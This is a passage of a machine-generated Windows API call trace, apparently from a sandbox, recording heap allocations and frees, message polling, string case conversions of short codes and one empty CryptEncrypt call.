0x2466e10 [0248.111] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0248.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0248.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0248.112] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0248.112] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0248.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0248.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0248.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0248.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0248.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0248.112] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0248.112] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.112] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0248.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0248.112] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0248.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0248.112] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0248.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0248.113] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0248.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0248.113] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0248.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0248.113] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0248.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0248.113] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0248.113] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0248.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0248.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0248.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0248.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0248.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0248.113] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0248.114] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.114] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0248.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0248.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0248.114] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0248.114] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0248.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0248.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0248.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0248.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0248.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0248.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0248.114] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0248.114] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0248.114] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0248.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0248.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0248.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0248.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0248.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0248.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0248.115] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.115] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0248.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0248.115] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0248.115] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0248.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0248.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0248.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0248.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0248.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0248.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0248.115] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0248.115] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0248.115] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0248.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0248.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0248.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0248.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0248.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0248.116] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0248.116] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0248.116] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0248.116] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0248.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0248.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0248.116] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.116] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0248.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0248.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0248.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0248.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0248.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0248.116] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0248.116] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0248.117] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0248.117] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.117] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.117] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.117] CryptEncrypt (in: hKey=0xaa5660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0248.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0248.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0248.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0248.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0248.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0248.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0248.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0248.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0248.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0248.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0248.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0248.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0248.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0248.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0248.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0248.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0248.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0248.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0248.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0248.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0248.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0248.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0248.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0248.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0248.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0248.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0248.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0248.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0248.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0248.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0248.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0248.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0248.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0248.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0248.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0248.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0248.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0248.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0248.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0248.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0248.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0248.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0248.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0248.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0248.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0248.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0248.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0248.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0248.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0248.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0248.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0248.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0248.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0248.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0248.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0248.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0248.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0248.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0248.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0248.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0248.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0248.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0248.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0248.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0248.121] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0248.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0248.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0248.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0248.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0248.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0248.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0248.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0248.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.122] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0248.122] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0248.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0248.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0248.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0248.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0248.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0248.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0248.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0248.122] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0248.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0248.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0248.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0248.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0248.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0248.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.123] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0248.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0248.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0248.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0248.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0248.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0248.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0248.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0248.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0248.123] HeapFree (in: 